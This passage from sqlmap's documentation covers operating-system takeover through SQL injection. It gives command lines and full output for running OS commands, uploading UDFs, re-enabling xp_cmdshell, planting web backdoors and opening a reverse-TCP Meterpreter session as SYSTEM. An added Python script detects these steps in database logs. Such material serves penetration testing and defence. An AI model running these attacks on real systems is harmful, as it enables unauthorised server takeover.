
sqlmap: operating system takeover

1. Executing arbitrary operating system commands

Switches and options: --os-cmd and --os-shell

When the back-end DBMS is MySQL, PostgreSQL or Microsoft SQL Server, and the session user has the required privileges, sqlmap can execute arbitrary commands on the database server's underlying operating system.

On MySQL and PostgreSQL, sqlmap uploads a shared library (binary file) containing two user-defined functions, sys_exec() and sys_eval(), creates them on the database and then calls one of them to execute the command (sqlmap asks you which one to use). On Microsoft SQL Server, sqlmap abuses the xp_cmdshell stored procedure: if it is disabled (the default on Microsoft SQL Server >= 2005), sqlmap re-enables it; if it has been removed, sqlmap re-creates it from scratch.

When the user wants to see the command's standard output, sqlmap uses one of the enumeration SQL injection techniques (blind, in-band or error-based) to retrieve it; otherwise, it uses the stacked queries technique to execute the command.

These techniques are detailed in the white paper Advanced SQL injection to operating system full control.

Example against a PostgreSQL target:

python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --os-cmd id -v 1

Output:

[...]
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: PostgreSQL
[hh:mm:12] [INFO] fingerprinting the back-end DBMS operating system
[hh:mm:12] [INFO] the back-end DBMS operating system is Linux
[hh:mm:12] [INFO] testing if current user is DBA
[hh:mm:12] [INFO] detecting back-end DBMS version from its banner
[hh:mm:12] [INFO] checking if UDF 'sys_eval' already exist
[hh:mm:12] [INFO] checking if UDF 'sys_exec' already exist
[hh:mm:12] [INFO] creating UDF 'sys_eval' from the binary UDF file
[hh:mm:12] [INFO] creating UDF 'sys_exec' from the binary UDF file
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:    'uid=104(postgres) gid=106(postgres) groups=106(postgres)'

[hh:mm:19] [INFO] cleaning up the database management system
do you want to remove UDF 'sys_eval'? [Y/n] y
do you want to remove UDF 'sys_exec'? [Y/n] y
[hh:mm:23] [INFO] database management system cleanup finished
[hh:mm:23] [WARNING] remember that UDF shared object files saved on the file system can only be deleted manually

You can also use the --os-shell option to simulate an interactive shell; like --sql-shell, this shell supports TAB completion and command history.

If the web application does not support stacked queries (for example PHP or ASP with MySQL as the back-end DBMS) and the DBMS is MySQL, sqlmap can still use the SELECT ... INTO OUTFILE clause to create a web backdoor in a writable directory of the web server and execute commands through it, provided the database and the web application are hosted on the same server. sqlmap also lets the user supply a comma-separated list of writable directory paths. In addition, sqlmap ships with tested web backdoors for the following languages:

  • ASP
  • ASP.NET
  • JSP
  • PHP

2. Out-of-band connection: Meterpreter and friends

Switches and options: --os-pwn, --os-smbrelay, --os-bof, --priv-esc, --msf-path and --tmp-path

When the back-end DBMS is MySQL, PostgreSQL or Microsoft SQL Server, and the session user has the required privileges, sqlmap can establish an out-of-band stateful TCP connection between the attacker's machine and the database server. Depending on the user's choice, this connection can be an interactive command shell, a Meterpreter session or a graphical user interface (VNC) session.

sqlmap relies on Metasploit to create the shellcode and implements four techniques to execute it on the database server:

  • In-memory execution of the Metasploit shellcode via the user-defined function sys_bineval(); supported on MySQL and PostgreSQL. Option: --os-pwn
  • Upload and execution of a Metasploit stand-alone payload stager via a user-defined function (sys_exec() on MySQL and PostgreSQL, xp_cmdshell() on Microsoft SQL Server). Option: --os-pwn
  • Execution of the Metasploit shellcode through an SMB attack (MS08-068); this requires the privileges sqlmap has obtained to be sufficiently high (uid=0 on Linux/Unix, Administrator on Windows). Option: --os-smbrelay
  • In-memory execution of the Metasploit payload by exploiting the buffer overflow in the sp_replwritetovarbin stored procedure of Microsoft SQL Server 2000 and 2005 (MS09-004). sqlmap has its own exploit, with automatic DEP memory protection bypass, to trigger the vulnerability, but it relies on Metasploit to generate the shellcode that is executed on successful exploitation. Option: --os-bof

These techniques are detailed in the white paper Advanced SQL injection to operating system full control.
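Every technique in sections 1 and 2 leaves the same small set of statements in the database's statement log: creation of the sys_exec/sys_eval/sys_bineval UDFs from a native library, SELECT ... INTO OUTFILE, and the enabling or calling of xp_cmdshell. The following Python is an added detection example, not part of the original page or of sqlmap; it scans constructed log lines, and the "timestamp dbms statement" log layout and the sample statements are assumptions.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample statement-log lines (not from the original page); an assumed
# "timestamp dbms statement" layout covering MySQL, PostgreSQL and SQL Server.
SAMPLE_LOG = """\
2024-01-01T10:00:01Z mysql SELECT id, name FROM users WHERE id=1
2024-01-01T10:00:02Z mysql CREATE FUNCTION sys_exec RETURNS int SONAME 'libsqlmapudf.so'
2024-01-01T10:00:03Z mysql SELECT 0x3c3f706870 INTO OUTFILE '/var/www/html/tmpu.php'
2024-01-01T10:00:04Z pgsql CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text AS '/tmp/libudf.so', 'sys_eval' LANGUAGE C STRICT
2024-01-01T10:00:05Z mssql EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE
2024-01-01T10:00:06Z mssql EXEC master..xp_cmdshell 'whoami'
2024-01-01T10:00:07Z mysql SELECT COUNT(*) FROM orders
"""

# Ordered rules; the first match names the finding. Each one corresponds to a
# takeover primitive the page describes (UDF upload, INTO OUTFILE backdoor, xp_cmdshell).
RULES = [
    ("udf_create", re.compile(
        r"CREATE\s+(?:OR\s+REPLACE\s+)?FUNCTION\s+(?:sys_exec|sys_eval|sys_bineval)\b", re.I)),
    ("native_function", re.compile(r"\bSONAME\b|\bLANGUAGE\s+C\b", re.I)),  # UDF under any name
    ("into_outfile", re.compile(r"\bINTO\s+(?:OUT|DUMP)FILE\b", re.I)),
    ("xp_cmdshell_enable", re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*1\b", re.I)),
    ("xp_cmdshell_exec", re.compile(r"\bxp_cmdshell\b", re.I)),
]


def classify(statement: str) -> Optional[str]:
    """Return the name of the first rule matching a logged statement, else None."""
    for name, pattern in RULES:
        if pattern.search(statement):
            return name
    return None


def scan(log_text: str) -> List[Tuple[int, str, str]]:
    """Scan a statement log; return (line number, finding, statement) for each hit."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        parts = line.split(" ", 2)  # timestamp, dbms tag, statement
        if len(parts) < 3:
            continue
        finding = classify(parts[2])
        if finding:
            findings.append((lineno, finding, parts[2]))
    return findings


if __name__ == "__main__":
    for lineno, finding, stmt in scan(SAMPLE_LOG):
        print(f"line {lineno}: {finding}: {stmt}")
```

The native_function rule deliberately fires on any function backed by a native library, since the UDF names are trivial to change; tune it against your own legitimate extensions before alerting on it.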

Example against a MySQL target:

python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/iis/get_int_55.aspx?id=1" --os-pwn --msf-path /software/metasploit

Result:

[...]
[hh:mm:31] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
[hh:mm:31] [INFO] fingerprinting the back-end DBMS operating system
[hh:mm:31] [INFO] the back-end DBMS operating system is Windows
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
> 
[hh:mm:32] [INFO] testing if current user is DBA
[hh:mm:32] [INFO] fetching current user
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
> 
[hh:mm:33] [INFO] checking if UDF 'sys_bineval' already exist
[hh:mm:33] [INFO] checking if UDF 'sys_exec' already exist
[hh:mm:33] [INFO] detecting back-end DBMS version from its banner
[hh:mm:33] [INFO] retrieving MySQL base directory absolute path
[hh:mm:34] [INFO] creating UDF 'sys_bineval' from the binary UDF file
[hh:mm:34] [INFO] creating UDF 'sys_exec' from the binary UDF file
how do you want to execute the Metasploit shellcode on the back-end database underlying operating system?
[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
[2] Stand-alone payload stager (file system way)
> 
[hh:mm:35] [INFO] creating Metasploit Framework multi-stage shellcode 
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
[3] Bind TCP: Listen on the database host for a connection
> 
which is the local address? [192.168.136.1] 
which local port number do you want to use? [60641] 
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
> 
[hh:mm:40] [INFO] creation in progress ... done
[hh:mm:43] [INFO] running Metasploit Framework command line interface locally, please wait..

                                _
                                | |      o
_  _  _    _ _|_  __,   ,    _  | |  __    _|_
/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |
|  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
                        /|
                        \|


    =[ metasploit v3.7.0-dev [core:3.7 api:1.0]
+ -- --=[ 674 exploits - 351 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops
    =[ svn r12272 updated 4 days ago (2011.04.07)

PAYLOAD => windows/meterpreter/reverse_tcp
EXITFUNC => thread
LPORT => 60641
LHOST => 192.168.136.1
[*] Started reverse handler on 192.168.136.1:60641 
[*] Starting the payload handler...
[hh:mm:48] [INFO] running Metasploit Framework shellcode remotely via UDF 'sys_bineval', please wait..
[*] Sending stage (749056 bytes) to 192.168.136.129
[*] Meterpreter session 1 opened (192.168.136.1:60641 -> 192.168.136.129:1689) at Mon Apr 11 hh:mm:52 +0100 2011

meterpreter > Loading extension espia...success.
meterpreter > Loading extension incognito...success.
meterpreter > [-] The 'priv' extension has already been loaded.
meterpreter > Loading extension sniffer...success.
meterpreter > System Language : en_US
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Computer        : W2K3R2
Architecture    : x86
Meterpreter     : x86/win32
meterpreter > Server username: NT AUTHORITY\SYSTEM
meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address  : 127.0.0.1
Netmask     : 255.0.0.0



Intel(R) PRO/1000 MT Network Connection
Hardware MAC: 00:0c:29:fc:79:39
IP Address  : 192.168.136.129
Netmask     : 255.255.255.0


meterpreter > exit

[*] Meterpreter session 1 closed.  Reason: User exit

On Windows, MySQL runs as SYSTEM by default, whereas PostgreSQL runs as the low-privileged user postgres on both Windows and Linux. SQL Server 2000 runs as SYSTEM by default, but SQL Server 2005 through 2008 run as NETWORK SERVICE most of the time and as LOCAL SERVICE occasionally.

The --priv-esc option can be used to run Metasploit's getsystem command to escalate privileges.
